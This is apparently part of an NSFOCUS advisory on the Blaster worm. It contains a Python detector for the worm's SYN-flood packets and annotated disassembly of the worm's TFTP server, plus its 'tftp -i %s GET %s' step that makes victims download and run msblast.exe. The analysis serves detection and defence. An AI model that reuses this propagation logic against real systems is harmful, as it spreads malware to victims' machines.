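        ip_checksum_ok=ones_complement_checksum(pkt[:ihl]) == 0)


def is_blaster_syn(h: HeaderSummary) -> bool:
    """True only when every hard-coded field of the worm's SYN packet is present."""
    return (h.ip_checksum_ok
            and h.ttl == BLASTER_TTL
            and h.total_len == BLASTER_TOTAL_LEN
            and h.ip_id_wire == BLASTER_IP_ID_WIRE
            and h.dst_port == BLASTER_DST_PORT
            and h.src_port in BLASTER_SRC_PORTS
            and h.flags == TCP_SYN
            and h.window == BLASTER_WINDOW)


def count_blaster_syns(packets: Iterable[bytes]) -> int:
    """Count matching packets in an iterable of raw IP packets (e.g. from a capture)."""
    return sum(1 for p in packets if (h := parse_ipv4_tcp(p)) and is_blaster_syn(h))


# Constructed sample 1: a packet shaped like the worm's SYN flood (TCP checksum not verified here).
SAMPLE_BLASTER_SYN = bytes.fromhex(
    "4500 0028 0100 0000 8006 0f54 c0a8 2dc9 cb00 710a"    # IPv4 header
    "04d2 0050 0000 1a2b 0000 0000 5002 4000 2619 0000")   # TCP header, SYN only
# Constructed sample 2: an ordinary SYN to port 80 (TTL 64, DF set, window 65535).
SAMPLE_NORMAL_SYN = bytes.fromhex(
    "4500 0028 1234 4000 4006 e28c 0a00 0005 cb00 710a"
    "c350 0050 1234 5678 0000 0000 5002 ffff 0000 0000")

if __name__ == "__main__":
    for sample in (SAMPLE_BLASTER_SYN, SAMPLE_NORMAL_SYN):
        hdr = parse_ipv4_tcp(sample)
        print(hdr.src_ip, "->", hdr.dst_ip, "blaster-like:", is_blaster_syn(hdr))
```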

………………

;tftp server function
:00401576 55                      push ebp
:00401577 89E5                    mov ebp, esp
:00401579 81EC2C040000            sub esp, 0000042C
:0040157F 53                      push ebx
:00401580 56                      push esi
:00401581 57                      push edi
:00401582 C7053840400001000000    mov dword ptr [00404038], 00000001
:0040158C 6A00                    push 00000000
:0040158E 6A02                    push 00000002        ;SOCK_DGRAM    uses UDP
:00401590 6A02                    push 00000002
:00401592 E82D0C0000              Call 004021C4        ;WS2_32.socket
:00401597 A324314000              mov dword ptr [00403124], eax
:0040159C 83F8FF                  cmp eax, FFFFFFFF
:0040159F 0F8445010000            je 004016EA
:004015A5 6A10                    push 00000010
:004015A7 6A00                    push 00000000
:004015A9 8D85D8FDFFFF            lea eax, dword ptr [ebp+FFFFFDD8]
:004015AF 50                      push eax
:004015B0 E8430E0000              Call 004023F8        ;CRTDLL.memset
:004015B5 83C40C                  add esp, 0000000C
:004015B8 66C785D8FDFFFF0200      mov word ptr [ebp+FFFFFDD8], 0002
:004015C1 6A45                    push 00000045        ;listen on port 69
:004015C3 E8900B0000              Call 00402158        ;WS2_32.htons
:004015C8 89C2                    mov edx, eax
:004015CA 668995DAFDFFFF          mov word ptr [ebp+FFFFFDDA], dx
:004015D1 83A5DCFDFFFF00          and dword ptr [ebp+FFFFFDDC], 00000000
:004015D8 6A10                    push 00000010
:004015DA 8D85D8FDFFFF            lea eax, dword ptr [ebp+FFFFFDD8]
:004015E0 50                      push eax
:004015E1 FF3524314000            push dword ptr [00403124]
:004015E7 E8F00B0000              Call 004021DC        ;WS2_32.bind
:004015EC 09C0                    or eax, eax
:004015EE 0F85F6000000            jne 004016EA
:004015F4 C785F8FDFFFF10000000    mov dword ptr [ebp+FFFFFDF8], 00000010
:004015FE 8D85F8FDFFFF            lea eax, dword ptr [ebp+FFFFFDF8]
:00401604 50                      push eax
:00401605 8D85E8FDFFFF            lea eax, dword ptr [ebp+FFFFFDE8]
:0040160B 50                      push eax
:0040160C 6A00                    push 00000000
:0040160E 6804020000              push 00000204
:00401613 8D85D4FBFFFF            lea eax, dword ptr [ebp+FFFFFBD4]
:00401619 50                      push eax
:0040161A FF3524314000            push dword ptr [00403124]
:00401620 E8630B0000              Call 00402188        ;WS2_32.recvfrom
:00401625 83F801                  cmp eax, 00000001    ;if a request arrived
:00401628 0F8CBC000000            jl 004016EA
:0040162E 31DB                    xor ebx, ebx
:00401630 6837484000              push 00404837        ;db 'rb',0    open the file read-only in binary mode
:00401635 6820304000              push 00403020        ;offset of the absolute path of the current file
:0040163A E8950D0000              Call 004023D4        ;CRTDLL.fopen
;this worm's tftp server works the same way as Nimda's: whatever file name is requested, it returns the worm file,
;so the tftp server does not leak system files. Unlike Nimda, the tftp server only runs after a machine has been attacked successfully,
;so it is normal not to see UDP/69 listening on a system infected with msblast.exe.

………………

;create the tftp server thread, then send the tftp command to transfer the file and run it
:00401CBD 8D85CCE6FFFF            lea eax, dword ptr [ebp+FFFFE6CC]
:00401CC3 50                      push eax
:00401CC4 6A00                    push 00000000
:00401CC6 6A00                    push 00000000
:00401CC8 6876154000              push 00401576        ;tftp server function
:00401CCD 6A00                    push 00000000
:00401CCF 6A00                    push 00000000
:00401CD1 E89E060000              Call 00402374        ;KERNEL32.CreateThread
:00401CD6 8985C0EDFFFF            mov dword ptr [ebp+FFFFEDC0], eax
:00401CDC 6A50                    push 00000050
:00401CDE E879060000              Call 0040235C        ;KERNEL32.Sleep
:00401CE3 683C404000              push 0040403C        ;db 'msblast.exe',0
:00401CE8 6800304000              push 00403000        ;local IP
:00401CED 680C484000              push 0040480C        ;db 'tftp -i %s GET %s',0
:00401CF2 8D85FCEDFFFF            lea eax, dwor

Disclaimer
==========

This security advisory only describes possible security problems; NSFOCUS provides no guarantee or commitment for it. Any direct or indirect consequences and losses arising from the distribution or use of the information in this advisory are the sole responsibility of the user; NSFOCUS and the authors of the advisory bear no liability. NSFOCUS reserves the right to modify and interpret this advisory. If you reproduce or distribute this advisory, you must keep it intact, including the copyright notice and all other content. Without NSFOCUS's permission, the content of this advisory may not be modified or abridged, nor used for commercial purposes in any way.

About NSFOCUS
============

NSFOCUS Co., Ltd. (绿盟科技) is a leading enterprise in China's network security field. It is dedicated to researching network and system security problems, developing and selling high-end network security products, and providing network security services; it offers internationally competitive products in intrusion detection/protection, remote assessment and DDoS attack protection, and is the domestic professional company with the most security service experience. For details about NSFOCUS, see: http://www.nsfocus.com

© 2018 NSFOCUS